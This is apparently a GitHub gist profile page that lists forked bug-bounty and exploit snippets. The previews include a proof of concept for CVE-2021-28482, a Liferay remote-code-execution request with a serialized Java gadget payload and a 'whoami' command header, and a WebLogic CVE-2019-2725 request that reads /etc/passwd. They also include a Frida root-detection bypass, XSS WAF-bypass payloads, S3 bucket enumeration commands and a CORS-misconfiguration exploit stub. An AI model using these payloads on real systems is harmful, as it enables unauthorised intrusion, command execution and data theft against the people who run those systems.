Skip to content

Instantly share code, notes, and snippets.

View chouaibhm's full-sized avatar

chouaib Hm chouaibhm

151 followers · 891 following
View GitHub Profile
@chouaibhm
chouaibhm / concurrency.go
Created October 2, 2021 10:48 — forked from hahwul/concurrency.go
Go concurrency
package main
import (
"fmt"
"strconv"
"sync"
)
func main() {
fmt.Println("vim-go")
@chouaibhm
chouaibhm / JavascriptRecon.md
Created August 8, 2021 20:52 — forked from fuckup1337/JavascriptRecon.md
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)
@chouaibhm
chouaibhm / PoC_CVE-2021-28482.py
Created May 5, 2021 19:53 — forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
@chouaibhm
chouaibhm / LiferayRce.txt
Created May 3, 2021 05:50 — forked from Mad-robot/LiferayRce.txt
POST /api/jsonws/invoke HTTP/1.1
Host: <Host>
Connection: close
cmd2: whoami
Content-Type: application/x-www-form-urlencoded
Content-Length: 4910
cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73
@chouaibhm
chouaibhm / Amass Config
Created April 30, 2021 01:24 — forked from PatrikFehrenbach/Amass Config
# Copyright 2017-2020 Jeff Foley. All rights reserved.
# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
# Should results only be collected passively and without DNS resolution? Not recommended.
#mode = passive
mode = active
# The directory that stores the Cayley graph database and other output files
# The default for Linux systems is: $HOME/.config/amass
#output_directory = amass
@chouaibhm
chouaibhm / CVE-2019-2725.md
Last active November 11, 2020 10:07 — forked from pikpikcu/CVE-2019-2725.md
CVE-2019-2725 weblogic ver:10.3.6 RCE

POST Request with burpsuite

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Content-Type: text/xml
SOAPAction: ""
Content-Length: 175816
CMD: cat /etc/passwd
Connection: close
@chouaibhm
chouaibhm / root_bypass.js
Created September 27, 2020 16:53 — forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@chouaibhm
chouaibhm / mutation_a.txt
Created June 18, 2020 16:33 — forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
@chouaibhm
chouaibhm / gist:9b997f149d39cf480260b3ff62eddd0f
Created February 3, 2020 13:31 — forked from the-xentropy/gist:05ab1c5efd7ae7651b14e0fb85c6312c
Use wfuzz or ffuf to enumerate s3
Ffuf (faster):
ffuf -u "https://s3.REGION.amazonaws.com/COMPANYDELIMITERENVIRONMENT" -w "aws-regions.txt:REGION" -w "company.txt:COMPANY" -w "delimiters.txt:DELIMITER" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:ENVIRONMENT" -mc 200 -v
Wfuzz:
wfuzz -u "https://s3.FUZZ.amazonaws.com/FUZ2ZFUZ3ZFUZ4Z" -w aws-regions.txt -w company.txt -w delimiters.txt -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" --sc 200 -v -t 50
The files:
@chouaibhm
chouaibhm / Firefox-CORS-Misconfig.js
Created July 4, 2019 14:09 — forked from Voorivex/Firefox-CORS-Misconfig.js
<html>
<meta content="text/html;charset=utf-8" http-equiv="Content-Type">
<meta content="utf-8" http-equiv="encoding">
<body onload="CreateListReaderIframe()">
<script>
function CreateListReaderIframe() {
var ifr = document.createElement("iframe");